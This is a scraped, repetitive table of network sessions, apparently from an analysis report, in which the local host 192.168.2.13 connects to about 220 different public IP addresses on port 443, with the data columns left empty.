                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12391192.168.2.1352996183.102.163.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12392192.168.2.134060213.244.40.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12393192.168.2.135714668.111.212.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12394192.168.2.134680887.186.19.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12395192.168.2.134454486.77.225.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12396192.168.2.1353798220.29.174.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12397192.168.2.1353948168.14.5.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12398192.168.2.135962892.193.139.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12399192.168.2.1359658152.146.58.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12400192.168.2.1341548163.96.229.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12401192.168.2.1332938206.158.42.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12402192.168.2.13597484.128.39.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12403192.168.2.1354360180.48.76.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12404192.168.2.134783898.68.251.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12405192.168.2.1345066188.218.123.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12406192.168.2.1355920115.72.7.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12407192.168.2.1333694166.25.236.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12408192.168.2.1357154137.133.184.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12409192.168.2.1345392109.107.189.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12410192.168.2.13377324.22.117.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12411192.168.2.1347420105.33.149.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12412192.168.2.1332940124.71.85.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12413192.168.2.1342132144.37.57.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12414192.168.2.135568075.108.197.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12415192.168.2.134009631.149.123.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12416192.168.2.135655892.191.42.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12417192.168.2.134005470.104.67.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12418192.168.2.1334942130.74.106.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12419192.168.2.135879694.13.8.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12420192.168.2.1360100193.35.49.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12421192.168.2.134140244.45.245.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12422192.168.2.133699220.17.228.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12423192.168.2.1359496140.112.76.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12424192.168.2.1334992182.250.67.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12425192.168.2.135522894.123.141.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12426192.168.2.1357104104.63.126.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12427192.168.2.1344778148.129.195.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12428192.168.2.1342734118.53.168.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12429192.168.2.1353768183.185.36.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12430192.168.2.134823247.24.145.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12431192.168.2.1354588169.172.131.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12432192.168.2.1336900187.112.251.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12433192.168.2.1339308137.71.204.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12434192.168.2.133657277.47.92.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12435192.168.2.133683841.207.175.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12436192.168.2.1340698105.140.153.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12437192.168.2.134942489.183.139.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12438192.168.2.134334071.3.216.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12439192.168.2.135207224.215.151.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12440192.168.2.135737847.103.190.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12441192.168.2.1340052146.81.202.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12442192.168.2.135382257.188.223.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12443192.168.2.1334412149.220.32.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12444192.168.2.133630684.242.6.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12445192.168.2.1360214121.157.90.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12446192.168.2.134059473.236.204.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12447192.168.2.1337858125.83.64.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12448192.168.2.135672019.66.24.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12449192.168.2.1356268140.33.49.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12450192.168.2.1353978167.8.211.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12451192.168.2.1351528119.191.244.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12452192.168.2.1349518202.14.42.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12453192.168.2.134618888.186.81.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12454192.168.2.135623647.216.142.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12455192.168.2.1338610126.210.156.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12456192.168.2.1351204175.222.178.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12457192.168.2.134211853.90.180.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12458192.168.2.133920453.61.227.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12459192.168.2.1359704140.41.25.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12460192.168.2.1347692112.165.42.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12461192.168.2.133444087.108.168.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12462192.168.2.1348634205.21.238.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12463192.168.2.1349098120.102.48.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12464192.168.2.1350766164.232.151.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12465192.168.2.1333166128.45.135.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12466192.168.2.133313283.114.169.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12467192.168.2.133529835.86.100.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12468192.168.2.134989238.180.62.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12469192.168.2.133685893.175.96.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12470192.168.2.135406653.204.148.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12471192.168.2.1339080200.39.234.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12472192.168.2.134404473.241.136.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12473192.168.2.135919420.120.231.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12474192.168.2.1333442126.59.5.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12475192.168.2.134093242.162.253.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12476192.168.2.1351010195.229.1.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12477192.168.2.1342452134.134.13.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12478192.168.2.134347491.94.84.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12479192.168.2.1345842147.197.193.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12480192.168.2.134830294.247.25.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12481192.168.2.1352188123.94.187.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12482192.168.2.134454818.239.52.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12483192.168.2.1348906203.157.132.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12484192.168.2.1341652146.51.53.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12485192.168.2.133460677.225.116.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12486192.168.2.1355272147.249.253.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12487192.168.2.133918499.245.117.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12488192.168.2.1352982154.31.41.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12489192.168.2.135050417.110.29.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12490192.168.2.133892685.227.42.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12491192.168.2.1348738103.254.120.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12492192.168.2.134365481.142.97.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12493192.168.2.1334834165.137.148.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12494192.168.2.135501258.24.172.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12495192.168.2.1338616117.2.201.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12496192.168.2.134428090.96.237.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12497192.168.2.134783857.111.80.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12498192.168.2.1343012211.27.191.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12499192.168.2.1335452176.248.92.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12500192.168.2.1342660194.208.166.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12501192.168.2.133589083.158.216.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12502192.168.2.134577012.138.133.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12503192.168.2.1344976101.106.171.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12504192.168.2.1342844130.192.253.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12505192.168.2.1355282199.94.178.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12506192.168.2.1337666175.44.108.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12507192.168.2.133336261.234.51.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12508192.168.2.135318868.210.63.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12509192.168.2.1333016208.142.120.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12510192.168.2.133692075.194.166.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12511192.168.2.133732642.200.212.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12512192.168.2.1336944141.237.166.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12513192.168.2.134998265.167.50.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12514192.168.2.133857098.121.89.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12515192.168.2.134497613.34.86.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12516192.168.2.13438802.143.121.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12517192.168.2.1352310138.172.30.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12518192.168.2.1354730189.100.105.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12519192.168.2.1360554160.181.208.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12520192.168.2.1351226104.165.196.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12521192.168.2.1337086149.30.76.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12522192.168.2.1360588135.101.113.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12523192.168.2.13365748.56.199.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12524192.168.2.1339990160.105.116.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12525192.168.2.1334090126.85.124.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12526192.168.2.1341634141.221.176.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12527192.168.2.1347290159.238.35.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12528192.168.2.133725635.46.176.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12529192.168.2.1350748138.165.237.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12530192.168.2.134925825.219.35.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12531192.168.2.134330663.88.52.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12532192.168.2.1338776208.77.91.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12533192.168.2.136003888.3.167.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12534192.168.2.1348988136.214.188.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12535192.168.2.1356646104.65.181.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12536192.168.2.135987487.243.193.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12537192.168.2.134089644.229.206.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12538192.168.2.1351554153.5.94.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12539192.168.2.1352278126.129.105.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12540192.168.2.135012014.20.209.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12541192.168.2.13342044.156.225.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12542192.168.2.1343664212.140.220.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12543192.168.2.1347820160.114.185.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12544192.168.2.1354166144.100.8.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12545192.168.2.1354556111.148.49.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12546192.168.2.135912085.39.22.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12547192.168.2.135288885.56.167.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12548192.168.2.1353932120.5.56.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12549192.168.2.135811870.141.65.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12550192.168.2.1332954150.77.254.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12551192.168.2.1360820134.237.58.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12552192.168.2.135296063.199.237.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12553192.168.2.1338720218.220.133.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12554192.168.2.13499144.226.178.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12555192.168.2.135161086.27.163.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12556192.168.2.1346376131.105.127.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12557192.168.2.1341046170.11.151.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12558192.168.2.135277499.84.53.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12559192.168.2.135145092.8.175.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12560192.168.2.1347890178.79.76.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12561192.168.2.1342612206.193.210.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12562192.168.2.1344702168.30.238.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12563192.168.2.134486819.144.49.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12564192.168.2.1343562138.11.84.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12565192.168.2.13410549.217.169.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12566192.168.2.1341128163.210.90.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12567192.168.2.135597414.118.226.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12568192.168.2.134205880.154.74.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12569192.168.2.1346370113.146.229.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12570192.168.2.1353062103.243.200.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12571192.168.2.1335710198.229.171.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12572192.168.2.135284082.130.186.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12573192.168.2.134232413.215.235.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12574192.168.2.1350242189.197.53.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12575192.168.2.135031417.147.7.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12576192.168.2.1355930178.208.230.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12577192.168.2.1345458140.130.19.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12578192.168.2.134858272.117.146.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12579192.168.2.1343180191.196.143.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12580192.168.2.1352820145.174.175.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12581192.168.2.135225220.219.229.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12582192.168.2.134479839.82.243.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12583192.168.2.134686217.209.72.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12584192.168.2.13388508.167.132.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12585192.168.2.1353904221.105.19.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12586192.168.2.1333588120.33.244.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12587192.168.2.1347450182.27.176.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12588192.168.2.1355580187.143.36.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12589192.168.2.135942284.187.67.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12590192.168.2.1338872128.229.140.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12591192.168.2.1339482142.43.40.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12592192.168.2.1353846158.65.105.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12593192.168.2.1341388109.74.70.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12594192.168.2.1346292220.16.210.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12595192.168.2.1355098121.49.111.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12596192.168.2.1351284115.212.70.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12597192.168.2.1337802108.195.20.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12598192.168.2.1338038130.242.195.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12599192.168.2.134585874.245.243.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12600192.168.2.1355566178.34.64.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12601192.168.2.134615291.229.117.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12602192.168.2.1342914181.225.116.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12603192.168.2.135074861.171.127.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12604192.168.2.134648643.177.219.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12605192.168.2.134430875.109.213.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12606192.168.2.134363677.9.175.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12607192.168.2.1359754206.108.163.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12608192.168.2.1341704220.239.91.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12609192.168.2.1360024152.73.6.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12610192.168.2.134261492.27.116.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12611192.168.2.1338542146.85.91.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        12612192.168.2.1352248169.136.243.201443
